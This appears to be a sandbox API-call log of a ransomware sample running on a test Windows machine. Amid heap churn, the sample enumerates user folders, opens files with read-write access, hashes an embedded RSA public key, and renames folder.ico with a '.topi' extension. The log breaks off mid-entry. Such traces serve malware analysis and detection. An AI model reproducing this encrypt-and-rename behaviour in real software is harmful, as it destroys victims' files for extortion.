RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="_private\\" [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3e20 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0097.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e20 | out: hHeap=0x680000) returned 1 [0097.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03200 [0097.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.171] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0097.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03200 | out: hHeap=0x680000) returned 1 [0097.171] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.171] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.171] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.171] PathFindFileNameW (pszPath="") returned="" [0097.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0097.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.172] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.172] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0097.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df4d0 [0097.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0097.172] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df4d0 | out: hHeap=0x680000) returned 1 [0097.173] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned=".ico" [0097.173] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.174] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=29926) returned 1 [0097.174] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.177] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.177] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.179] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.179] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x74e6, lpOverlapped=0x0) returned 1 [0097.180] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.180] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.180] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.180] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df4d0) returned 1 [0097.181] CryptCreateHash (in: hProv=0x6df4d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.181] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.181] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.181] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.181] GetLastError () returned 0x0 [0097.181] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.181] CryptReleaseContext (hProv=0x6df4d0, dwFlags=0x0) returned 1 [0097.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.181] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.181] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.181] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x74f0) returned 0x99f92d8 [0097.182] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.183] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.topi")) returned 1 [0097.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.183] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.185] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0097.185] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.185] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.185] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.185] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\") returned="-u63kcF\\" [0097.185] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0097.185] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0097.185] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.185] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.185] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.185] PathFindFileNameW (pszPath="") returned="" [0097.186] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.186] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\") returned="2s0-\\" [0097.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0097.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0097.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.186] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.186] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.186] PathFindFileNameW (pszPath="") returned="" [0097.186] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\HD3TE3n6wSRH5_2y6cr.m4a") returned=".m4a" [0097.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\HD3TE3n6wSRH5_2y6cr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\hd3te3n6wsrh5_2y6cr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.187] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=83044) returned 1 [0097.187] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.190] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1443e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 